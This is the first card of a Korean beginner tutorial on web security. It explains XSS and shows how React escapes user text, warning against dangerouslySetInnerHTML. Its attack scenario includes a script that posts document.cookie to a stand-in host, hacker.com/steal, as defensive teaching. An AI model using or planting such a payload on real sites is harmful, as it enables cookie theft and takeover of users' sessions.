웹 보안 기초 — 해킹 방어 | 웹 개발 기초 | JIT

🌐 웹 개발 기초›웹 보안 기초 — 해킹 방어1/5

XSS는 사용자 입력에 악성 스크립트를 숨기는 공격입니다

공격 시나리오

html

<!-- 게시판에 이런 글을 작성 -->
<script>
  // 사용자 쿠키를 해커 서버로 전송
  fetch('https://hacker.com/steal', {
    method: 'POST',
    body: document.cookie,
  });
</script>
<!-- 다른 사용자가 이 글을 열면
     스크립트가 실행됨! -->

React의 자동 방어

tsx

// ✅ React는 자동으로 이스케이프
function Comment({ text }) {
  // <script> 태그가 문자열로 표시됨
  // 실행되지 않음!
  return <p>{text}</p>;
}
// ⚠️ 위험: dangerouslySetInnerHTML
// 이건 이스케이프를 우회함
<div dangerouslySetInnerHTML={{
  __html: userInput  // 절대 금지!
}} />

탭하여 계속 ▸

1 / 5